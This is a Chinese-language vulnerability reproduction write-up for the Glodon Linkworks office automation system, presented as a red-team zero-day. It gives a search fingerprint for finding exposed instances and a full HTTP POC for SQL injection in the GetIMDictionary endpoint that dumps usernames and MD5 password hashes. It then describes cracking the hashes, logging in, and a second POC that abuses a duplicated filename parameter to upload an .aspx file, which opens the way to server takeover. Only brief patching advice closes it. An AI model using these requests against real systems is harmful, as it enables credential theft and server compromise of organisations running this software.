广联达 Linkworks办公OA SQL注入+后台文件上传漏洞复现（HW0day）

0x01 产品简介

    广联达Linkworks办公OA（Office Automation）是一款综合办公自动化解决方案，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。

0x02 漏洞概述

   由于 广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞。而msgbroadcastuploadfile.aspx接口处存在后台文件上传漏洞，攻击者通过SQL注入获取管理员信息后，可以登陆发送请求包获取服务器权限。

0x03 复现环境

鹰图指纹：web.body="/Services/Identification/Server/"

0x04 漏洞复现

访问以下url验证漏洞是否存在

http://your-ip/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary

 出现以上情况则存在漏洞

POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

PS：直接查询用户名密码 

 解密

尝试登录

后台文件上传

PoC

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Cookie: 登录后的

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text

test
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

 0x05 修复建议

 限制访问来源地址，如非必要，不要将系统开放在互联网上。 

  尽快打补丁！